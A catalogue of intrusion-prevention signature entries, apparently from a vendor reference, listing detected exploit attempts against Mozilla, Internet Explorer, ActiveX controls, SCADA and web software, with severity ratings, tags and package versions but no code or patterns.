File-Text_Mozilla-Products-Animation-Timeline-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Mozilla Thunderbird, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1828-5242
Last changed: sgpkg-ips-1828-5242
Vulnerability: Mozilla-Products-Animation-Timeline-Use-After-Free
Description:
Back to top

File-Text_Mozilla-Products-Ensurecachedattrparamarrays-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Products-Ensurecachedattrparamarrays-Integer-Overflow
Description:
Back to top

File-Text_Mozilla-Products-Frame-Comment-Objects-Manipulation-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox/SeaMonkey browsers detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, CVE2006, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1308-5242
Vulnerability: HTTP-Mozilla-Products-Frame-Comment-Objects-Manipulation-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-Products-IDN-Spoofing-Vulnerability

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2005, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Products-IDN-Spoofing-Vulnerability
Description:
Back to top

File-Text_Mozilla-Products-MathML-Integer-Overflow

About this situation: Detected an attempt to exploit Mozilla based browsers
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Products-MathML-Integer-Overflow
Description:
Back to top

File-Text_Mozilla-Products-Nscssvalue-Array-Index-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Products-Nscssvalue-Array-Index-Integer-Overflow
Description:
Back to top

File-Text_Mozilla-Products-Overflow-Event-Handling-Memory-Corruption

About this situation: Attempt to exploit memory corruption vulnerability in Mozilla Foundation products detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Products-Overflow-Event-Handling-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-Products-QueryInterface-Method-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla based products detected
Context: Text File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2006, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Mozilla-Products-QueryInterface-Method-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-Products-Regular-Expressions-Heap-Corruption

About this situation: Detects heap-based buffer overflow exploits against Mozilla based browsers
Context: Text File Stream
Severity: 7
Tags: Any Operating System, x86, Mozilla based browsers, CVE2006, Any Operating System not specific, Mozilla based browsers not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Mozilla-Products-Regular-Expressions-Heap-Corruption
Description:
Back to top

File-Text_Mozilla-Shell-Protocol-Validation

About this situation: An attempt to exploit a vulnerability in Mozilla detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Any Hardware, Netscape, Mozilla Firefox, Mozilla Thunderbird, Mozilla Browser, Windows XP not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Shell-Protocol-Validation
Description:
Back to top

File-Text_Mozilla-Soapparameter-Integer-Overflow-Vulnerability

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Mozilla Suite detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Suite, CVE2004, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Mozilla-Soapparameter-Integer-Overflow-Vulnerability
Description:
Back to top

File-Text_Mozilla-Suite-DOM-Property-Code-Execution

About this situation: Detects Mozilla Suite DOM property code execution exploits
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Mozilla Suite, CVE2005, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: HTTP-Mozilla-Suite-DOM-Property-Code-Execution-Vulnerability
Description:
Back to top

File-Text_Mozilla-Thunderbird-Iframe-JavaScript-Execution

About this situation: Detects Mozilla Thunderbird iframe JavaScript execution exploits
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Mozilla Thunderbird, CVE2006, Any Operating System not specific, Potential Denial of Service
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1107-5242
Vulnerability: Generic-Mozilla-Thunderbird-Iframe-JavaScript-Execution
Description:
Back to top

File-Text_MPack-JavaScript-Decoder

About this situation: Attempt to download MPack generated code was detected
Context: Text File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Generic browser, Any Operating System not specific, Generic browser not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: MPack-Attack-Platform
Description:
Back to top

File-Text_MS-appinstaller-URI-Scheme-Link-In-HTML

About this situation: ms-appinstaller URI scheme detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1672-5242
Last changed: sgpkg-ips-1672-5242
Vulnerability: MS-appinstaller-URI-Scheme
Description:
Back to top

File-Text_MS-Exchange-URL-Redirection-CVE-2014-6336

About this situation: A vulnerability in Microsoft Exchange
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Exchange Server, MS2014-11, CVE2014, Windows not specific, Exchange Server not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: MS-Exchange-URL-Redirection-CVE-2014-6336
Description:
Back to top

File-Text_MS-Forefront-UAG-Poisoned-Cup-Of-Code-Execution-Vulnerability

About this situation: Attempt to exploit a vulnerability in Microsoft Forefront UAG detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Forefront Unified Access Gateway, MS2011-10, CVE2011, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-417-4219
Vulnerability: MS-Forefront-UAG-Poisoned-Cup-Of-Code-Execution-Vulnerability
Description:
Back to top

File-Text_MS-Ie-Async-Null-Object-Access-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2012-08, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-468-5211
Vulnerability: MS-Ie-Async-Null-Object-Access-Remote-Code-Execution
Description:
Back to top

File-Text_MS-Ie-HTML-Sanitization-Vulnerability-CVE-2013-1289

About this situation: Malicious script
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer, MS2013-04, CVE2013, Windows not specific, Internet Explorer not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-519-5211
Last changed: sgpkg-ips-519-5211
Vulnerability: MS-Ie-HTML-Sanitization-Vulnerability-CVE-2013-1289
Description:
Back to top

File-Text_MS-Ie-Layout-Memory-Corruption-Vulnerability-CVE-2012-1526

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer 7.0, MS2012-08, CVE2012, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-468-5211
Vulnerability: MS-Ie-Layout-Memory-Corruption-Vulnerability-CVE-2012-1526
Description:
Back to top

File-Text_MS-Ie-Style-Tag-Comment-DoS

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer, MS2004-12, CVE2004, Windows not specific, Internet Explorer not specific, Potential Denial of Service
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: MS-Ie-Style-Tag-Comment-DoS
Description:
Back to top

File-Text_MS-Internet-Explorer-And-Sharepoint-Services-HTML-Sanitization-XSS

About this situation: An attempt to exploit a vulnerability in Microsoft Groove Server detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Microsoft Sharepoint, MS2010-10, CVE2010, Windows not specific, Internet Explorer not specific, Microsoft Sharepoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-722-5211
Vulnerability: Microsoft-Internet-Explorer-And-Sharepoint-Services-HTML-Sanitization-XSS
Description:
Back to top

File-Text_MS-Internet-Explorer-CVE_2012-1889

About this situation: An attempt to exploit a vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2012-08, CVE2012, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-468-5211
Vulnerability: MS-Internet-Explorer-CVE_2012-1889
Description:
Back to top

File-Text_MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0270

About this situation: An attempt to exploit vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2014-02, CVE2014, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-564-5211
Vulnerability: MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0270
Description:
Back to top

File-Text_MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0276

About this situation: An attempt to exploit vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2014-02, CVE2014, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-564-5211
Vulnerability: MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0276
Description:
Back to top

File-Text_MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0278

About this situation: An attempt to exploit vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2014-02, CVE2014, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-564-5211
Vulnerability: MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0278
Description:
Back to top

File-Text_MS-Internet-Explorer-Select-Element-Remote-Code-Execution

About this situation: Attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-10, CVE2011, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-1733-5242
Vulnerability: MS-Internet-Explorer-Select-Element-Remote-Code-Execution
Microsoft-Internet-Explorer-Select-Element-Memory-Corruption
Description:
Back to top

File-Text_MS-Internet-Explorer-Style-Object-Memory-Corruption-CVE-2011-1964

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-08, CVE2011, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1332-5242
Vulnerability: Microsoft-Internet-Explorer-Style-Object-Memory-Corruption-CVE-2011-1964
Description:
Back to top

File-Text_MS-Internet-Explorer-Telnet-Handler-Code-Execution-CVE-2011-1257

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-08, CVE2011, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1287-5242
Vulnerability: Microsoft-Internet-Explorer-Telnet-Handler-Code-Execution-CVE-2011-1257
Description:
Back to top

File-Text_MS-Rich-Textbox-Control-Insecure-Method-Arbitrary-File-Overwrite

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Studio detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio, CVE2008, Windows not specific, Microsoft Visual Studio not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Microsoft-Rich-Textbox-Control-Savefile-Insecure-Method-Arbitrary-File-Overwrite
Description:
Back to top

File-Text_MS-Search-URI-Scheme-Link-In-HTML

About this situation: search-ms or search URI scheme detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1829-5242
Vulnerability: MS-Search-URI-Scheme
Description:
Back to top

File-Text_MS-Sharepoint-Callback-Function-Vulnerability-CVE-2013-0080

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2013-03, CVE2013, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-787-5211
Last changed: sgpkg-ips-787-5211
Vulnerability: Sharepoint-Callback-Function-Vulnerability-CVE-2013-0080
Description:
Back to top

File-Text_MS-Windows-Msxml-Information-Disclosure-Vulnerability

About this situation: An attempt to exploit vulnerability in Microsoft MSXML detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2014-02, CVE2014, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-564-5211
Vulnerability: MS-Windows-Msxml-Information-Disclosure-Vulnerability
Description:
Back to top

File-Text_MS-XML-Remote-Code-Execution-CVE-2018-8420

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-09, CVE2018, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1334-5242
Vulnerability: MS-XML-Remote-Code-Execution-CVE-2018-8420
Description:
Back to top

File-Text_MSHTML_Engine_Memory_Corruption_Vulnerability_CVE-2020-1567

About this situation: An attempt to exploit a vulnerability in MSHTML Engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2020-08, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1269-5242
Last changed: sgpkg-ips-1269-5242
Vulnerability: MSHTML_Engine_Memory_Corruption_Vulnerability_CVE-2020-1567
Description:
Back to top

File-Text_MSIE-JSON-Array-Information-Disclosure-Vulnerability

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MS2013-05, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-523-5211
Vulnerability: MSIE-JSON-Array-Information-Disclosure-Vulnerability
Description:
Back to top

File-Text_MSIE-Memory-Corruption-Vulnarability-CVE-2013-3193

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-08, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-536-5211
Last changed: sgpkg-ips-536-5211
Vulnerability: MSIE-Memory-Corruption-Vulnarability-CVE-2013-3193
Description:
Back to top

File-Text_MSWebDVD-Class-Null-Pointer-Assignment

About this situation: Attempt to exploit a vulnerability in DirectX detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Any Hardware, DirectX, Windows XP not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-637-5211
Vulnerability: MSWebDVD-Class-Null-Pointer-Assignment
Description:
Back to top

File-Text_Mujahideen-Secrets-Key-File

About this situation: A Moujahedeen Secrets key file was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mujahedeen Secrets, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-493-5211
Vulnerability: Mujahideen-Secrets-Key-File
Description:
Back to top

File-Text_Multiple-ActiveX-Buffer-Overflow-Vulnerabilities

About this situation: An attempt to exploit an ActiveX control vulnerability detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Invensys Wonderware, BACnet OPC Client, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Vulnerability: Invensys-Wonderware-SCADA-ActiveX-Buffer-Overflow-Vulnerability
BACnet-OPC-Client-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Multiple-ActiveX-Buffer-Overflow-Vulnerability-2

About this situation: Vulnerable method usage detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Invensys Wonderware, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Vulnerability: Invensys-Wonderware-SCADA-ActiveX-Buffer-Overflow-Vulnerability
BACnet-OPC-Client-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Multiple-Browser-Long-Unicode-DoS-Memory-Corruption

About this situation: An attempt to exploit a Multiple Browser Long Unicode DoS Memory Corruption Vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Generic browser, Windows not specific, Generic browser not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-676-5211
Vulnerability: Multiple-Browser-Long-Unicode-DoS-Memory-Corruption
Description:
Back to top

File-Text_Multiple-Browser-Marquee-DoS-Memory-Corruption

About this situation: An attempt to exploit a Multiple Browser Marquee DoS Memory Corruption Vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Generic browser, CVE2006, Windows not specific, Generic browser not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-676-5211
Vulnerability: Multiple-Browser-Marquee-DoS-Memory-Corruption
Description:
Back to top

File-Text_Multiple-Browsers-Telnet-URI-Handler-File-Manipulation-Vulnerability

About this situation: An attempt to exploit a vulnerability in Apple Computer Safari detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2004, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Multiple-Browsers-Telnet-URI-Handler-File-Manipulation-Vulnerability
Description:
Back to top

File-Text_Multiple-Vendors-JS-Engine-Speculative-Execution-Jit-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Edge, Mozilla Firefox or Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Chrome, Microsoft Edge, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1770-5242
Vulnerability: Multiple-Vendors-JS-Engine-Speculative-Execution-Jit-Information-Disclosure
Description:
Back to top

File-Text_MW6-Technologies-Aztec-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in MW6 Technologies Aztec ActiveX (Aztec.dll) detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MW6 Technologies Aztec ActiveX, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: MW6-Technologies-Aztec-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_MW6-Technologies-Barcode-ActiveX-Control-Buffer-Overflow

About this situation: Detected an attempt to exploit a vulnerability in MW6 Technologies Barcode ActiveX control
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MW6 Technologies Barcode ActiveX, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: MW6-Technologies-Barcode-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_MW6-Technologies-Datamatrix-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in MW6 Technologies DataMatrix ActiveX (DataMatrix.dll) detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MW6 Technologies DataMatrix ActiveX, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-567-5211
Vulnerability: MW6-Technologies-Datamatrix-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_MW6-Technologies-Maxicode-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in MW6 Technologies MaxiCode ActiveX (MaxiCode.dll) detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MW6 Technologies MaxiCode ActiveX, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: MW6-Technologies-Maxicode-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_mySCADA-myPRO-CVE-2023-28384-Command-Injection

About this situation: An attempt to exploit a vulnerability in mySCADA myPRO detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, mySCADA myPRO, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: mySCADA-myPRO-CVE-2023-28384-Command-Injection
Description:
Back to top

File-Text_mySCADA-myPRO-CVE-2023-28716-Command-Injection

About this situation: An attempt to exploit a vulnerability in mySCADA myPRO detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, mySCADA myPRO, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1629-5242
Last changed: sgpkg-ips-1629-5242
Vulnerability: mySCADA-myPRO-CVE-2023-28716-Command-Injection
Description:
Back to top

File-Text_Nakivo-Backup-And-Replication-Arbitrary-File-Read-CVE-2024-48248

About this situation: An attempt to exploit a vulnerability in NAKIVO Backup and Replication detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, NAKIVO Backup and Replication, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1854-5242
Last changed: sgpkg-ips-1854-5242
Vulnerability: Nakivo-Backup-And-Replication-Arbitrary-File-Read-CVE-2024-48248
Description:
Back to top

File-Text_National-Instruments-Installer-ActiveX-Arbitrary-File-Creation

About this situation: An attempt to exploit a vulnerability in National Instruments Installer Framework detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, National Instruments Installer Framework, ABB DataManager, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-532-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: National-Instruments-Installer-Framework-ActiveX-Arbitrary-File-Creation
Description:
Back to top

File-Text_NCTsoft-NCTAudioFile2-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in NCTsoft NCTAudioFile2 ActiveX control detected
Context: Text File Stream
Severity: 10
Tags: Windows, x86, NCTsoft NCTAudioStudio, NCTsoft NCTDialogicVoice, NCTsoft NCTAudioEditor, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-NCTsoft-NCTAudioFile2-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_NetGear-Orbi-Satellite-RBS750-Command-Execution-CVE-2022-36429

About this situation: An attempt to exploit a vulnerability in NetGear Orbi detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear Orbi, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1595-5242
Last changed: sgpkg-ips-1595-5242
Vulnerability: NetGear-Orbi-Satellite-RBS750-Command-Execution-CVE-2022-36429
Description:
Back to top

File-Text_NetIQ-Security-Solutions-For-Iseries-Safeshellexecute-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in NetIQ Security Solutions for iSeries detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, NetIQ Security Solutions for iSeries, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-664-5211
Last changed: sgpkg-ips-664-5211
Vulnerability: NetIQ-Security-Solutions-For-Iseries-Safeshellexecute-Stack-Buffer-Overflow
Description:
Back to top

File-Text_NginxProxyManager-Proxy-Host-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in NginxProxyManager detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, NginxProxyManager, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1457-5242
Last changed: sgpkg-ips-1462-5242
Vulnerability: NginxProxyManager-Proxy-Host-Stored-Cross-Site-Scripting
Description:
Back to top

File-Text_NodeBB-Socket.io-Elevation-Of-Privilege

About this situation: An attempt to exploit a vulnerability in NodeBB detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, NodeBB, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Vulnerability: NodeBB-Socket.io-Elevation-Of-Privilege
Description:
Back to top

File-Text_NodeBB-Socket.io-Eventname-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in NodeBB detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, NodeBB, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1643-5242
Last changed: sgpkg-ips-1643-5242
Vulnerability: NodeBB-Socket.io-Eventname-Denial-Of-Service
Description:
Back to top

File-Text_Nodejs-JS-YAML-Load-Code-Execution

About this situation: Node.js js-yaml load() Code Execution detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Node.js, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-570-5211
Vulnerability: Nodejs-JS-YAML-Load-Code-Execution
Description:
Back to top

File-Text_Non-Standard-Port-In-Iframe-Src-Attribute

About this situation: Non-standard port in src attribute of an iframe detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic browser, Any Operating System not specific, Generic browser not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-500-5211
Last changed: sgpkg-ips-500-5211
